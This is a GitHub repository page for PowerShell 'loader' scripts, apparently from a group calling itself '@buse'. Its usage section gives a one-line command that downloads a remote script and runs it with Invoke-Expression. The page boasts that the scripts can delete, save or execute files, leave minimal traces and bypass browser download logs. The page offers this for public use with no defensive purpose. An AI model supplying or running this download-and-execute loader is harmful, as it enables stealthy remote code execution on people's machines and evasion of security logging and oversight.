Skip to content

abusedev/powershell

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

38 Commits
 
 
 
 
 
 

Repository files navigation

@buse

Logo

@buse powershell

This repo contains powershell scripts to install software/scripts without saving logs from a browser and no exe file, sometimes refered to as a "loader"

Is this being actively used now?

No. We have moved on to using our own loader software and have updated these scripts for public information and usage

Usage

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression "& { $(Invoke-WebRequest -UseBasicParsing 'https://raw.githubusercontent.com/kamishirodev/scripts/main/client.ps1') }"

Pasting this one line of code in Powershell will load the main script which can be of any length, in here you can do things such as: delete files, save files, load/execute files, or really anything that powershell can do. These are designed to leave only small traces that windows itself leaves behind and bypass browser download logs

Licensing

Permissions

  • ✔️ Commercial use
  • ✔️ Modification
  • ✔️ Distribution
  • ✔️ Private use

Release conditions

  • ❕ License and copyright notice
  • ❕ State changes
  • ❕ Disclose source
  • ❕ Same license

Limitations

  • ❌ Liability
  • ❌ Warranty

License being used: GNU General Public License v2.0 license

About

Bypass browser based download logs for downloading assistance software

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published